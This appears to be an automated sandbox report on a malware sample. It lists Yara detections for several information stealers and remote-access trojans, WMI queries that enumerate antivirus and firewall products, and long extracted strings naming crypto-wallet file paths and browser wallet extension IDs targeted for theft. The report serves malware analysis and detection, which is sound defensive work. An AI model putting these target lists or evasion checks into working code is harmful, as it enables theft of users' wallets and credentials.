Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0040996D

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_004143C0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

2_2_004143C0

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

2_2_004144B0

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_6BC88390 NSS_GetVersion,

2_2_6BC88390

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2528909810.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21732000000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21732000000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217294b49f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2172952eb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2450353895.0000021713EAB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2874374264.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2614325718.0000000005B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2871918307.0000000001202000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5564, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2528909810.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001AB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|MetaMask\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|TronLink\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|Binance Wallet\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|0\|0\|Yoroi\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase Wallet extension\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|0\|Jaxx Liberty\|cjelfplplebdjjenllpjcblmjkfcffne\|1\|0\|0\|iWallet\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|MEW CX\|nlbmnnijcnlegkjjpcfjclmcfggfefdm\|1\|0\|0\|GuildWallet\|nanjmdknhkinifnkgdcggcfnhdaammmj\|1\|0\|0\|Ronin Wallet\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CLV Wallet\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|Liquality Wallet\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra Station Wallet\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|Sollet\|fhmfendgdocmcbmfikdcogofphimnkno\|1\|0\|0\|Auro Wallet(Mina Protocol)\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|Polymesh Wallet\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98 Wallet\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain Wallet\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Brave Wallet\|odbfpeeihdkbihmopkbjmoonfanlbfcl\|1\|0\|0\|Oxygen\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|Pali Wallet\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|BOLT X\|aodkkagnadcbobfpggfnjeongemjbjca\|1\|0\|0\|XDEFI Wallet\|hmeobnfnfcmdkdcmlblgagmfpfboieaf\|1\|0\|0\|Nami\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Maiar DeFi Wallet\|dngmlblcodfobpdpecaadgfbcggfjfnm\|1\|0\|0\|Keeper Wallet\|lpilbniiabackdjcionkobglmddfbcjo\|1\|0\|0\|Solflare Wallet\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|Cyano Wallet\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Temple\|ookjlbkiijinhpmnjffcofjonbfbgaoc\|1\|0\|0\|Goby\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|Ronin Wallet\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|Byone\|nlgbhdfgdhgbiamfdfmbikcdghidoadd\|1\|0\|0\|OneKey\|jnmbobjmhlngoefaiojfljckilhhlhcj\|1\|0\|0\|DAppPlay\|lodccjjbdhfakaekdiahmedfbieldgik\|1\|0\|0\|SteemKeychain\|jhgnbkkipaallpehbohjmkbjofjdmeid\|1\|0\|0\|Braavos Wallet\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|kkpllkodjeloidieedojogacfhpaihoh\|1\|1\|1\|OKX Wallet\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender Wallet\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|Eternl\|kmhcihpebfmpgmihbkipmjlmmioameka\|1\|0\|0\|Pontem Aptos Wallet\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Petra Aptos Wallet\|ejjladinnckdgjemekebdpeokbikhfci\|1\|0\|0\|Martian Aptos Wallet\|efbglgofoippbgcjepnhiblaibcnclgk\|1\|0\|0\|Finnie\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra Wallet\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Trezor Password Manager\|imloifkgjagghnncjkhggdhalmcnfklk\|1\|0\|0\|Authenticator\|bhghoamapcdpbohphigoooaddinpkbai\|1\|0\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo 